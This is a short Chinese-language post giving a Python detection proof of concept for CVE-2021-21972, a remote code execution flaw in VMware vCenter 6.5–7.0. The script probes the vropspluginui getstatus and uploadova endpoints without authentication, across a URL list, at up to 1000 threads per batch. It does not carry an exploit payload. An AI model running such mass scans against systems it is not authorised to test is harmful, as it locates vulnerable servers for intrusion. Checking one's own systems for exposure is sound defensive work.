CVE-2021-21972 vCenter 6.5-7.0 RCE 漏洞检测POC

poc如下

import requests
import threading
import warnings
warnings.filterwarnings("ignore")

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
}


def run(thread_function, *args):
    threads = []
    for par in args[0]:
        thread = threading.Thread(target=thread_function, args=par)
        threads.append(thread)
        thread.start()
    for t in threads:
        t.join()


def poc(*args):
    try:
        url = args[0]
        url1 = url + '/ui/vropspluginui/rest/services/getstatus'
        url1 = url1[:7] + url1[7:].replace("//", "/")
        res = requests.get(url1, headers=headers, verify=False, timeout=5)
        if res.status_code == 200 and '{"States":' in res.text:
            print([url, url1, "存在漏洞:Unauthorized RCE in VMware vCenter", res.text[:50]])
            return True
        url2 = url + '/ui/vropspluginui/rest/services/uploadova'
        url2 = url2[:7] + url2[7:].replace("//", "/")
        res = requests.post(url2, headers=headers, verify=False, timeout=5)
        if res.status_code == 500 and '{"stackTrace":' in res.text:
            print([url, url2, "存在漏洞:Unauthorized RCE in VMware vCenter", res.text[:50]])
            return True
    except:
        pass


with open("url.txt") as f:
    urllist = [(i.strip(),) for i in f.readlines()]
    # print(urllist)

thread_num = 1000
for num in range(0, len(urllist), thread_num):
    start = num
    end = start + thread_num
    run(poc, urllist[start:end])